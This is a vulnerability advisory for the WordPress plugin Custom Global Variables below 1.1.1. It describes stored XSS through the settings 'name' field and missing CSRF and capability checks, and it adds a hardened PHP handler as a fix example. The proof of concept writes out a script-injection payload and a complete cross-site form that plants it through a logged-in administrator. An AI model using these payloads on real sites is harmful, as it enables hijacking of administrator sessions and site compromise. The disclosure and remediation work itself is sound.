WordPress Plugin Vulnerabilities

Custom Global Variables < 1.1.1 - Stored Cross-Site Scripting (XSS)

Description

The plugin does not sanitise the 'name' field of a variable added in its settings, leading to a Stored Cross-Site Scripting issue. Attackers could also use the lack of CSRF and capability checks to make a logged-in administrator add the payload and make them perform further unwanted actions.

Proof of Concept

As an administrator, go to the Settings > Custom Global Variables page, add the following payload ("><script>alert(/XSS/)</script><") in the 'name' field, add any value in the 'value' field and submit it.

Via CSRF:
<html>
  <body>
    <form action="https://example.com/wp-admin/options-general.php?page=custom-global-variables" method="POST">
      <input type="hidden" name="vars[1][name]" value='"><script>alert(/XSS/)</script>' />
      <input type="hidden" name="vars[1][val]" value="a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
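
A hardened save and render path for the three gaps described above (capability check, CSRF check, sanitising and escaping the 'name' field), as an added example written for this page and not the plugin's own code or its 1.1.1 fix. It assumes a settings handler that receives the vars[n][name] / vars[n][val] fields seen in the proof of concept and that both fields are plain text; the option key, nonce action and function names are hypothetical.

```php
<?php
// Hypothetical hardened handlers for a settings page that accepts
// vars[n][name] / vars[n][val]. Names below are assumptions, not the plugin's.
const CGV_OPTION       = 'example_cgv_vars'; // hypothetical option key
const CGV_NONCE_ACTION = 'example_cgv_save'; // hypothetical nonce action

function example_cgv_save_settings() {
    if ( 'POST' !== $_SERVER['REQUEST_METHOD'] || ! isset( $_POST['vars'] ) ) {
        return;
    }
    // Capability check: only users who may manage options can change variables.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // CSRF check: a cross-site auto-submitted form cannot supply a valid nonce.
    check_admin_referer( CGV_NONCE_ACTION );
    $clean = array();
    foreach ( (array) wp_unslash( $_POST['vars'] ) as $row ) {
        if ( ! is_array( $row ) || ! isset( $row['name'], $row['val'] ) ) {
            continue;
        }
        // Sanitise on input: strips tags, line breaks and extra whitespace.
        $name = sanitize_text_field( $row['name'] );
        if ( '' !== $name ) {
            $clean[] = array( 'name' => $name, 'val' => sanitize_text_field( $row['val'] ) );
        }
    }
    update_option( CGV_OPTION, $clean );
}
add_action( 'admin_init', 'example_cgv_save_settings' );

function example_cgv_render_rows() {
    wp_nonce_field( CGV_NONCE_ACTION ); // emits the hidden _wpnonce field
    foreach ( (array) get_option( CGV_OPTION, array() ) as $i => $row ) {
        // Escape on output: a stored '">' can no longer close the attribute.
        printf(
            '<input type="text" name="vars[%1$d][name]" value="%2$s" />' .
            '<input type="text" name="vars[%1$d][val]" value="%3$s" />',
            (int) $i, esc_attr( $row['name'] ), esc_attr( $row['val'] )
        );
    }
}
```

Escaping at render time is what protects rows that were stored before any input sanitisation was in place.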

Affects Plugins

References

Exploitdb

Classification

Type
XSS
CWE
CVSS

Miscellaneous

Original Researcher
Swapnil Subhash Bodekar
Verified
Yes

Timeline

Publicly Published
2021-01-11 (about 3 years ago)
Added
2021-01-11 (about 3 years ago)
Last Updated
2021-03-10 (about 3 years ago)